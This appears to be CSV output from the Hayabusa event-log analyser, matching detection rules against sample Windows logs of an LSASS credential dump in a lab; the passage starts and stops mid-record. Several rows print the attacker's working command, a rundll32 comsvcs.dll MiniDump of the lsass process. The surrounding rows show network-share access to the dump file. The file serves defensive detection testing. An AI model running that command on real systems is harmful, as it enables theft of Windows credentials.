C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs 
DLL,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,../hayabusa-rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx 
+2021-10-20 23:19:03.334 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:23.345 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:43.347 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:19:43.347 
+09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 
0x26bdfde,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be000,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:09.961 
+09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll 
MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 
0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 23:39:26.224 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "" # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# Options include: RelativeFilePaths - [bool] Always resolve file paths using Resolve-Path -Relative. The default is to use some heuristics to guess if relative or absolute is better. To customize your own custom options, pass a hashtable to CompleteInput, e.g. 
return [System.Management.Automation.CommandCompletion]::CompleteInput($inputScript, $cursorColumn, @{ RelativeFilePaths=$false } #> [CmdletBinding(DefaultParameterSetName = 'ScriptInputSet')] Param( [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 0)] [string] $inputScript, [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 1)] [int] $cursorColumn, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 0)] [System.Management.Automation.Language.Ast] $ast, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 1)] [System.Management.Automation.Language.Token[]] $tokens, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 2)] [System.Management.Automation.Language.IScriptPosition] $positionOfCursor, [Parameter(ParameterSetName = 'ScriptInputSet', Position = 2)] [Parameter(ParameterSetName = 'AstInputSet', Position = 3)] [Hashtable] $options = $null ) End { if ($psCmdlet.ParameterSetName -eq 'ScriptInputSet') { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#inputScript#> $inputScript, <#cursorColumn#> $cursorColumn, <#options#> $options) } else { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#ast#> $ast, <#tokens#> $tokens, <#positionOfCursor#> $positionOfCursor, <#options#> $options) } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$space = New-Object System.Management.Automation.Host.BufferCell $space.Character = ' ' $space.ForegroundColor = $host.ui.rawui.ForegroundColor $space.BackgroundColor = $host.ui.rawui.BackgroundColor $rect = New-Object System.Management.Automation.Host.Rectangle $rect.Top = 
$rect.Bottom = $rect.Right = $rect.Left = -1 $origin = New-Object System.Management.Automation.Host.Coordinates $Host.UI.RawUI.CursorPosition = $origin $Host.UI.RawUI.SetBufferContents($rect, $space) # .Link # http://go.microsoft.com/fwlink/?LinkID=225747 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param([string[]]$paths) $OutputEncoding = [System.Console]::OutputEncoding if($paths) { foreach ($file in $paths) { Get-Content $file | more.com } } else { $input | more.com },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME Get-Help .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='AllUsersView', HelpUri='http://go.microsoft.com/fwlink/?LinkID=113316')] param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$true)] [string] ${Name}, [string] ${Path}, [ValidateSet('Alias','Cmdlet','Provider','General','FAQ','Glossary','HelpFile','ScriptCommand','Function','Filter','ExternalScript','All','DefaultHelp','Workflow')] [string[]] ${Category}, [string[]] ${Component}, [string[]] ${Functionality}, [string[]] ${Role}, [Parameter(ParameterSetName='DetailedView', Mandatory=$true)] [switch] ${Detailed}, [Parameter(ParameterSetName='AllUsersView')] [switch] ${Full}, [Parameter(ParameterSetName='Examples', Mandatory=$true)] [switch] ${Examples}, [Parameter(ParameterSetName='Parameters', 
Mandatory=$true)] [string] ${Parameter}, [Parameter(ParameterSetName='Online', Mandatory=$true)] [switch] ${Online}, [Parameter(ParameterSetName='ShowWindow', Mandatory=$true)] [switch] ${ShowWindow}) #Set the outputencoding to Console::OutputEncoding. More.com doesn't work well with Unicode. $outputEncoding=[System.Console]::OutputEncoding Get-Help @PSBoundParameters | more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME New-Item .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='pathSet', SupportsShouldProcess=$true, SupportsTransactions=$true, ConfirmImpact='Medium')] [OutputType([System.IO.DirectoryInfo])] param( [Parameter(ParameterSetName='nameSet', Position=0, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='pathSet', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [System.String[]] ${Path}, [Parameter(ParameterSetName='nameSet', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [AllowNull()] [AllowEmptyString()] [System.String] ${Name}, [Parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [System.Object] ${Value}, [Switch] ${Force}, [Parameter(ValueFromPipelineByPropertyName=$true)] [System.Management.Automation.PSCredential] ${Credential} ) begin { try { $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Item', [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd -Type Directory @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline() $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } 
catch { throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param( [Parameter(ValueFromPipeline=$true)] [string[]] $verb = '*' ) begin { $allVerbs = [PSObject].Assembly.GetTypes() | Where-Object {$_.Name -match '^Verbs.'} | Get-Member -type Properties -static | Select-Object @{ Name='Verb' Expression = {$_.Name} }, @{ Name='Group' Expression = { $str = ""$($_.TypeName)"" $str.Substring($str.LastIndexOf('Verbs') + 5) } } } process { foreach ($v in $verb) { $allVerbs | Where-Object { $_.Verb -like $v } } } # .Link # http://go.microsoft.com/fwlink/?LinkID=160712 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[CmdletBinding()] param( [ValidateRange(2, 2147483647)] [int] ${Width}, [Parameter(ValueFromPipeline=$true)] [psobject] ${InputObject}) begin { try { $PSBoundParameters['Stream'] = $true $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Out-String',[System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } <# .ForwardHelpTargetName Out-String .ForwardHelpCategory Cmdlet 
#>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location A:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location B:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location C:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location D:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location E:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS 
dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location F:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location G:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx +2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 